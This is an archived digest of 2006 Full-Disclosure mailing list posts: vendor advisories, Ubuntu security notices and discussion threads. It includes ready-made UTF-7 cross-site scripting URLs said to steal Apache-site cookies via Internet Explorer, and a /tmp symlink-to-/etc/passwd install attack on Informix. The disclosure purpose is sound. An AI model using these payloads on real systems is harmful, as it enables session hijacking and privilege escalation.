<7.0.1.0.0.20061001180650.021ff140@sbcglobal.net> ================================================== Layered Defense Research Advisory 1 October 2006 ================================================== 1) Affected Software TrendMicro OfficeScan Corporate Edition 7.3 ================================================== 2) Severity Rating: Medium risk Impact: Execution of arbitrary code, potential remote exploit, and denial of service. ================================================== 3) Description of Vulnerability A format string vulnerability was discovered within Trendmicro OfficeScan Corporate Edition 7.3. The vulnerability is due to improper processing of format strings within OfficeScan Management consoles ActiveX Control "ATXCONSOLE.OCX". Specially crafted format string passed back to the Management consoles Remote Client Install name search would allow access to the process stack. If successfully exploited, this could allow the user to execute code of the attackers choice on the system running the ActiveX management Console. ================================================== 4) Solution The solutions to fix this vulnerability is addressed by OfficeScan Corporate Edition 7.3 Patch 1 http://www.trendmicro.com/download/product.asp?productid=5 ================================================== 5) Time Table 06/27/2006 -- Reported Vulnerability to Vendor. 06/30/2006 -- Vendor supplied hot fix to Layered Defense for testing. 09/21/2006 -- Vendor releases fix in Patch 1 to public. ================================================== 6) Credits Discovered by Deral Heiland, www.LayeredDefense.com ================================================== 7) About Layered Defense Research Layered Defense Research, Is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena. http://www.layereddefense.com ================================================== From Valdis.Kletnieks at vt.edu Mon Oct 2 01:52:32 2006 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 01 Oct 2006 20:52:32 -0400 Subject: [Full-disclosure] Truths in "Truth in Caller ID Act" In-Reply-To: Your message of "Sun, 01 Oct 2006 13:41:56 CDT." <20061001184156.GA15403@infiltrated.net> References: <20061001184156.GA15403@infiltrated.net> Message-ID: <200610020052.k920qWCT010437@turing-police.cc.vt.edu> On Sun, 01 Oct 2006 13:41:56 CDT, "J. Oquendo" said: > "It shall be unlawful for any person within the United States, in connection > with any telecommunications service or VOIP service..." > 1) Teleco/VoIP service is out of bounds here. 2) The User who initiated the > command is logged from an address somewhere over the rainbow (Tor+Privoxy). 3) > "within the United States" which? The person, or the telco/VoIP provider? Does > it have to be both - person and provider. Sounds broad to me. No, you're intentionally reading it other than what the legal guys will do. The prosecutor can charge *each and every person involved* who is both a) within the US and b) took an identifiable action which lead to the event. The person who made the request obviously took an action that lead to the event, and if they're inside the US, they may have a problem. The provider took an action (by providing the service) and if they're inside the US, they may want to find a lawyer that can create a good theory of why they aren't culpable as well. > 2) Me being the provider, I didn't initiate the spoof, I provided a service. > Should I be held accountable for upholding the right to privacy? You took an action which caused the forged caller ID to be sent. Better hope that the Congressman doesn't have friends over at Dept of Justice who can make your life miserable. Also, please note that you're arguing the wrong right - the "right to privacy" would be applicable if you were trying to protect the person from a Congressman who was trying to prove the person slept with a political rival or similar. What you *wanted* to be supporting was the First Amendment right to anonymous free speech. > Let's take the case of someone blowing the whistle on government corruption. > History has shown their life will be ruined. Sucks to be a whistleblower. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/6ce67198/attachment.bin From lcashdol at gmail.com Mon Oct 2 01:24:59 2006 From: lcashdol at gmail.com (Larry Cashdollar) Date: Sun, 1 Oct 2006 20:24:59 -0400 Subject: [Full-disclosure] IBM Informix Dynamic Server V10.0 File Clobbering during Install In-Reply-To: References: Message-ID: IBM Informix (IDS) V10.0 File Clobbering during Install 10/1/2006 Overview >From the Website (http://www-306.ibm.com/software/data/informix/ids/) "IBM Informix(r) Dynamic Server (IDS) is a strategic data server in the IBM Information Management Software portfolio that provides blazing online transaction processing (OLTP) performance, legendary reliability, and nearly hands-free administration to businesses of all sizes. IDS 10 offers significant improvements in performance, availability, security, and manageability over previous versions, including patent-pending technology that virtually eliminates downtime and automates many of the tasks associated with deploying mission-critical enterprise systems." Vulnerability During installation the installserver script creates a file in /tmp called installserver.txt an unpriviledged user can symlink this file to another file causing the target file have the contents of installserver.txt appened to it. vapid:/tmp# ls -l /tmp/installserver.txt lrwxrwxrwx 1 auditor auditor 11 Oct 1 18:27 /tmp/installserver.txt -> /etc/passwd After installation the contents of installserver.txt was appened to /etc/passwd. File Permissions The default file permissions of the installation package are too open, an unpriviledged user can take advantage of an installation by a priviledged user by injecting code into the installer script. nobody at vapid:/home/auditor/test$ ls -l total 273168 -rw-rw-rw- 1 root root 10328050 Aug 1 2005 Gls.rpm -rw-rw-rw- 1 32100 1360 5125418 Aug 1 2005 IIF.jar -rw-rw-rw- 1 root root 84374286 Aug 1 2005 IIFServer.rpm -rw-rw-rw- 1 root root 786557 Aug 1 2005 Message.rpm drwxrwxrwx 2 32100 1360 4096 Aug 1 2005 doc -rw-r--r-- 1 auditor auditor 140032000 Oct 1 18:21 iif.10.00.UC3R1TL.Linux.tar -rwxr-xr-x 1 32100 1360 4424 Aug 1 2005 install_rpm -rwxrwxrwx 1 32100 1360 38727685 Oct 1 18:46 installserver -rwxr-xr-x 1 32100 1360 5069 Aug 1 2005 server.ini Resolution The installer scripts should have more restrictive default permissions, also the installserver.txt file should be moved inside of the ismp001 directory that is created during installation. Credit Larry W. Cashdollar http://vapid.dhs.org From jon at oberheide.org Mon Oct 2 04:08:13 2006 From: jon at oberheide.org (Jon Oberheide) Date: Sun, 01 Oct 2006 23:08:13 -0400 Subject: [Full-disclosure] [ANNOUNCE] Aimject 0.6 Message-ID: <1159758493.766.8.camel@cosign.example.edu> Aimject 0.6 has been released: http://jon.oberheide.org/projects/aimject/ Aimject facilitates man-in-the-middle attacks against AOL Instant Messenger's OSCAR protocol via a simple GTK interface. Regards, Jon Oberheide -- Jon Oberheide GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/10d3479c/attachment.bin From i.m.crazy.frog at gmail.com Mon Oct 2 05:08:02 2006 From: i.m.crazy.frog at gmail.com (crazy frog crazy frog) Date: Mon, 2 Oct 2006 09:38:02 +0530 Subject: [Full-disclosure] Security Rss Feeds In-Reply-To: <20061001000521.23421.qmail@cgisecurity.net> References: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com> <20061001000521.23421.qmail@cgisecurity.net> Message-ID: <41011d980610012108g2f449f5fjd9653fcd085fab7c@mail.gmail.com> thanks all for sharing, i found around 240+ list of various security related RSS Feeds. Get it here:- http://www.secgeeks.infys.net/security_rss_feeds _CF On 10/1/06, bugtraq at cgisecurity.net wrote: > Add http://www.cgisecurity.com/index.rss as well ;p > -z > > > > > > --===============1915392881== > > Content-Type: multipart/alternative; > > boundary="----=_Part_36651_2419662.1159650305531" > > > > ------=_Part_36651_2419662.1159650305531 > > Content-Type: text/plain; charset=UTF-8; format=flowed > > Content-Transfer-Encoding: 7bit > > Content-Disposition: inline > > > > Add two more to that list > > > > http://portal.spidynamics.com/blogs/msutton/rss.aspx > > http://ha.ckers.org/blog/feed/ > > > > Paul, thanks for the new add's to me reader :)- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- ting ding ting ding ting ding ting ding ting ding ding i m crazy frog :) "oh yeah oh yeah... another wannabe, in hackerland!!!" From yoshiaki.nakanishi at gmail.com Mon Oct 2 01:28:13 2006 From: yoshiaki.nakanishi at gmail.com (Yoshiaki Nakanishi) Date: Mon, 2 Oct 2006 09:28:13 +0900 Subject: [Full-disclosure] (no subject) Message-ID: From psz at maths.usyd.edu.au Mon Oct 2 13:36:20 2006 From: psz at maths.usyd.edu.au (Paul Szabo) Date: Mon, 2 Oct 2006 22:36:20 +1000 Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]) Message-ID: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> Eiji James Yoshida wrote in http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049784.html : > If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7 > string in the response's body, it will set the charset encoding to UTF-7 > automatically ... > Proof of concept: > http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-... I know that Apache servers return The requested URL /xyz was not found on this server. when fetching http://apache.svr/xyz . Trouble is that IE shows a "custom" error message, ignoring the error body. Pondering, see that http://en.wikipedia.org/wiki/HTTP_404 says: > ... Internet Explorer will not display these pages, however, unless they > are larger than 512 bytes. ... This provides UXSS (Universal Cross-Site Scripting): http://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ... (with a couple of hundred Zs) will do what we want. Works for https also: https://apache.svr/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-/ZZZ... Can steal any Apache server (http or https) cookies. I do not have easy access to ISS servers to test whether similar attacks would work there. Will Apache fix (carefully escape) the error message? Will MS fix IE to not be so over-friendly? In the meantime, do not use IE to do anything "private" like banking... Cheers, Paul Szabo psz at maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia From muts at remote-exploit.org Mon Oct 2 02:55:37 2006 From: muts at remote-exploit.org (muts) Date: Mon, 2 Oct 2006 03:55:37 +0200 Subject: [Full-disclosure] McAfee EPO Buffer Overflow In-Reply-To: Message-ID: <000f01c6e5c5$dbd20510$2100a8c0@kamau> ################################################################### # # # McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow # # # # www.remote-exploit.org # # # # muts {at} remote-exploit org # ################################################################### [-] Product Information McAfeeR ePolicy OrchestratorR is a security management solution that gives you a coordinated defense against malicious threats and attacks. As your central hub, you can keep protection up to date; configure and enforce protection policies; and monitor security status from one centralized console. [-] Vulnerability Description McAfeeR ePolicy OrchestratorR contains a pre-authentication buffer overflow vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP server, and is also vulnerable. [-] Exploit Proof of concept exploit code is available at http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm [-] Exploitation Details http://www.remote-exploit.org/advisories/mcafee-epo.pdf [-] Vendor Status Vendor was notified July 14th, 2006. ehm. [-] Credits The vulnerability was discovered by Mati Aharoni (muts) and xbxice. [-] Shameless Promotion Get ready for BackTrack v.2.0! From martin.pitt at canonical.com Mon Oct 2 14:40:49 2006 From: martin.pitt at canonical.com (Martin Pitt) Date: Mon, 2 Oct 2006 15:40:49 +0200 Subject: [Full-disclosure] [USN-355-1] openssh vulnerabilities Message-ID: <20061002134049.GA4662@piware.de> =========================================================== Ubuntu Security Notice USN-355-1 October 02, 2006 openssh vulnerabilities CVE-2006-4924, CVE-2006-5051 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: openssh-server 1:3.9p1-1ubuntu2.3 Ubuntu 5.10: openssh-server 1:4.1p1-7ubuntu4.2 Ubuntu 6.06 LTS: openssh-server 1:4.2p1-7ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Tavis Ormandy discovered that the SSH daemon did not properly handle authentication packets with duplicated blocks. By sending specially crafted packets, a remote attacker could exploit this to cause the ssh daemon to drain all available CPU resources until the login grace time expired. (CVE-2006-4924) Mark Dowd discovered a race condition in the server's signal handling. A remote attacker could exploit this to crash the server. (CVE-2006-5051) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.diff.gz Size/MD5: 143243 ee5b491cf023e53b4991fe319da669aa http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1-1ubuntu2.3.dsc Size/MD5: 866 237dcc91dde3201ba0bc5b9372654708 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_3.9p1.orig.tar.gz Size/MD5: 832804 530b1dcbfe7a4a4ce4959c0775b85a5a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_3.9p1-1ubuntu2.3_all.deb Size/MD5: 31312 a25012353606283dbae09b56dc60f1bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_amd64.udeb Size/MD5: 166846 b0507203d786efa365cef305acc0b790 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_amd64.deb Size/MD5: 544562 4464ce148432194666a3fd7fae5b884f http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_amd64.udeb Size/MD5: 179290 2774b437173889390312fab14a0d9edf http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_amd64.deb Size/MD5: 279624 deb54b320447ab79b8d8fb351c04960d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_amd64.deb Size/MD5: 62924 083fd0c899ed8c0c088f6f659d2fd017 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_i386.udeb Size/MD5: 139452 31deaca18b94b27d52c1870d86810db4 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_i386.deb Size/MD5: 492810 8df816ca89945adc93e80d49f53aebe6 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_i386.udeb Size/MD5: 149160 632d59e71b6a3f5aab50e4cfd3842442 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_i386.deb Size/MD5: 256218 5f9791afb335d57cd1a830c1e886ee08 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_i386.deb Size/MD5: 62512 9f21ce3a1134980ec47c1e99cf62ff61 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_3.9p1-1ubuntu2.3_powerpc.udeb Size/MD5: 159886 447da8535b3b4c0b85fefd44e01f4c4d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5: 541254 8d16c7e18fef84ab8f6a435c8c988b93 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_3.9p1-1ubuntu2.3_powerpc.udeb Size/MD5: 163428 e0ca6e79f907c35e2c32e515b8e808dd http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5: 273640 c8e00fcbe413ac902ccc4dca508572f2 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_3.9p1-1ubuntu2.3_powerpc.deb Size/MD5: 64092 a88a46209fac664959c35b36fb93066e Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.diff.gz Size/MD5: 158624 fc0f2620cc3fc07ad4ea050b675e5f1b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1-7ubuntu4.2.dsc Size/MD5: 971 cd61da4d0742c684aaf90b8390252818 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.1p1.orig.tar.gz Size/MD5: 909689 3709109adf0b82176668b3d3478dd033 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.1p1-7ubuntu4.2_all.deb Size/MD5: 1050 d520acb54639c9b900b973c08e1a5fe8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.1p1-7ubuntu4.2_amd64.udeb Size/MD5: 162614 0e4e07c663d0f33f3fd73a0b6c2e433a http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.1p1-7ubuntu4.2_amd64.deb Size/MD5: 584852 bb1ac6382aa349a7bea3cccf0948117e http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.1p1-7ubuntu4.2_amd64.udeb Size/MD5: 179490 a1bccf78a412d6799d25f0ca73ab4623 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.1p1-7ubuntu4.2_amd64.deb Size/MD5: 223914 ec3d782f9c3b88c97cea3b928e458fea http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.1p1-7ubuntu4.2_amd64.deb Size/MD5: 78228 02951ff37cc638222a067c77b808523d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.1p1-7ubuntu4.2_i386.udeb Size/MD5: 138272 3a49a90c6f6f9f52c775aeecb05caf76 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.1p1-7ubuntu4.2_i386.deb Size/MD5: 515080 0100950f90ddd99704be28b2c9ff8478 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.1p1-7ubuntu4.2_i386.udeb Size/MD5: 149782 c89f7310123da769a7eec86d6ba72a6a http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.1p1-7ubuntu4.2_i386.deb Size/MD5: 195292 7cf57e81b03dce633eb56bdc44655c89 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.1p1-7ubuntu4.2_i386.deb Size/MD5: 77944 15d8e58dd24c85d380432bc3b7a633c7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.1p1-7ubuntu4.2_powerpc.udeb Size/MD5: 155858 f4f64f9b3de12bfc043661e8e31d090c http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.1p1-7ubuntu4.2_powerpc.deb Size/MD5: 569144 baabd24742192f1df2ceb5220d540937 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.1p1-7ubuntu4.2_powerpc.udeb Size/MD5: 163322 42064b77c600c04ba5441876830a772d http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.1p1-7ubuntu4.2_powerpc.deb Size/MD5: 215386 c4360aa642d117f539ff2d1082ae705b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.1p1-7ubuntu4.2_powerpc.deb Size/MD5: 79512 e25ff733bd60854f7a42cfa0c636eb7d sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.1p1-7ubuntu4.2_sparc.udeb Size/MD5: 147902 13d070c8101686ef53e062c136d609be http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.1p1-7ubuntu4.2_sparc.deb Size/MD5: 524974 c67b3c3cd75b37b9e10d03033e657c7c http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.1p1-7ubuntu4.2_sparc.udeb Size/MD5: 158836 a425ab0c6cbc9ae5dd09a4880a36e374 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.1p1-7ubuntu4.2_sparc.deb Size/MD5: 199192 85892b06e6780bba357d9c68ff36e0fd http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.1p1-7ubuntu4.2_sparc.deb Size/MD5: 77982 ab47361323b0a7686fe4fad3639df44d Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.1.diff.gz Size/MD5: 171326 3d966ce050b176961a34c8f14148ef18 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1-7ubuntu3.1.dsc Size/MD5: 1005 acf698bd9a5e848b80343a49b3ab5f5b http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_4.2p1.orig.tar.gz Size/MD5: 928420 93295701e6bcd76fabd6a271654ed15c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh_4.2p1-7ubuntu3.1_all.deb Size/MD5: 1056 ff5c9e1bc32aac160738d603fb3c9015 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.1_amd64.udeb Size/MD5: 165846 e483c01679c325ac0edeb5981cdba060 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.1_amd64.deb Size/MD5: 610616 5a5b73f2d68a90385b2dd70c539cfb4a http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.1_amd64.udeb Size/MD5: 182038 bc2c80a21f2afde523a17e311233ebc5 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.1_amd64.deb Size/MD5: 236212 90663453b5c114622627469f4ffd822a http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.1_amd64.deb Size/MD5: 86868 12bbd3d97943ce3751a3186494c31798 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.1_i386.udeb Size/MD5: 140068 8873836c923eb3205df376916b0c3669 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.1_i386.deb Size/MD5: 536704 801dcb0f46badf9ff4376a4484663b00 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.1_i386.udeb Size/MD5: 151544 28e22a72700630c00231c843662ed755 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.1_i386.deb Size/MD5: 205490 7e5acb93eb0243e1272f1ffed0145112 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.1_i386.deb Size/MD5: 86476 091d1ca0ef964b1cbc714cb050ef558d powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.1_powerpc.udeb Size/MD5: 158524 ae42600aed557c45556394035eacd10a http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.1_powerpc.deb Size/MD5: 593628 29d5510f526ddfa16a138b1d61c1cc75 http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.1_powerpc.udeb Size/MD5: 165942 d5d1c6333c9406b1bf623b4db1c8824a http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.1_powerpc.deb Size/MD5: 226264 166b3da3dd64758a38f7731dc0c16703 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.1_powerpc.deb Size/MD5: 88152 2860a81b3d8d554f5356bab74573504b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client-udeb_4.2p1-7ubuntu3.1_sparc.udeb Size/MD5: 149224 5f60da6926ed8b994cdc8dcf42b65088 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-client_4.2p1-7ubuntu3.1_sparc.deb Size/MD5: 543560 c9003ef5e14236a26d3b3a7abb25db9f http://security.ubuntu.com/ubuntu/pool/universe/o/openssh/openssh-server-udeb_4.2p1-7ubuntu3.1_sparc.udeb Size/MD5: 160664 51e52151d74fd317648700234478e638 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-server_4.2p1-7ubuntu3.1_sparc.deb Size/MD5: 208870 6833a77599010cfe464f54bf0290b516 http://security.ubuntu.com/ubuntu/pool/main/o/openssh/ssh-askpass-gnome_4.2p1-7ubuntu3.1_sparc.deb Size/MD5: 86516 8dac0a82e5edaabfac6f8596a84ff884 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/508baaf8/attachment.bin From martin.pitt at canonical.com Mon Oct 2 14:40:55 2006 From: martin.pitt at canonical.com (Martin Pitt) Date: Mon, 2 Oct 2006 15:40:55 +0200 Subject: [Full-disclosure] [USN-356-1] gdb vulnerability Message-ID: <20061002134055.GB4662@piware.de> =========================================================== Ubuntu Security Notice USN-356-1 October 02, 2006 gdb vulnerability CVE-2006-4146 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: gdb 6.3-5ubuntu1.2 Ubuntu 5.10: gdb 6.3-6ubuntu2.1 Ubuntu 6.06 LTS: gdb 6.4-1ubuntu5.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Will Drewry, of the Google Security Team, discovered buffer overflows in GDB's DWARF processing. This would allow an attacker to execute arbitrary code with user privileges by tricking the user into using GDB to load an executable that contained malicious debugging information. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-5ubuntu1.2.diff.gz Size/MD5: 153643 e778f57ab6b5e5cd8a25f341dea386d2 http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-5ubuntu1.2.dsc Size/MD5: 837 5d33b1de3070cc590724be1c5e4fbc6a http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3.orig.tar.gz Size/MD5: 17374476 812de9e756d53c749ea5516d9ffa5905 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-5ubuntu1.2_amd64.deb Size/MD5: 2952220 1f8fa48cd5e17e4b453daa59e4b420a2 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-5ubuntu1.2_i386.deb Size/MD5: 2648450 b4c9fb6a83e310e881875395bf1aad2d powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-5ubuntu1.2_powerpc.deb Size/MD5: 4047224 8208cb25191742da0764d92b7a1f638a Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1.diff.gz Size/MD5: 155595 d6fffb81e21b1f3c9d94de74c99e391b http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1.dsc Size/MD5: 837 fad531a07b7820254e5f9a6e46299a30 http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3.orig.tar.gz Size/MD5: 17374476 812de9e756d53c749ea5516d9ffa5905 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1_amd64.deb Size/MD5: 3013838 05ff0877c090fd168f390f8f56164aac i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1_i386.deb Size/MD5: 2647276 5c3884902f84eae7c261b1bbb1806152 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1_powerpc.deb Size/MD5: 4123126 af6da76ce945b6e2867f7834ba00a42e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.3-6ubuntu2.1_sparc.deb Size/MD5: 2802006 d8816a2ea175c3f3949716157bfa195d Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1.diff.gz Size/MD5: 49396 b7d66d72f16c73371c3fdd73d0bf8128 http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1.dsc Size/MD5: 791 7daf4d5cd11ed554e6f675355fb29cdf http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4.orig.tar.gz Size/MD5: 18508095 7dc98022ee96bba5331f195dc8a5491a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1_amd64.deb Size/MD5: 3089952 2f9c6efaca60dd3c92246f515e50a6fe i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1_i386.deb Size/MD5: 2700670 24c99faef3d69502f34212adc45aa0f5 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1_powerpc.deb Size/MD5: 4208002 83aef6ee330108b55587c8cd048e13f7 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gdb/gdb_6.4-1ubuntu5.1_sparc.deb Size/MD5: 2824562 c38ce8413d8a9a7e363d0ff15d89544f -------------- next part -------------- A non-text attachment was scrubbed... Name: not 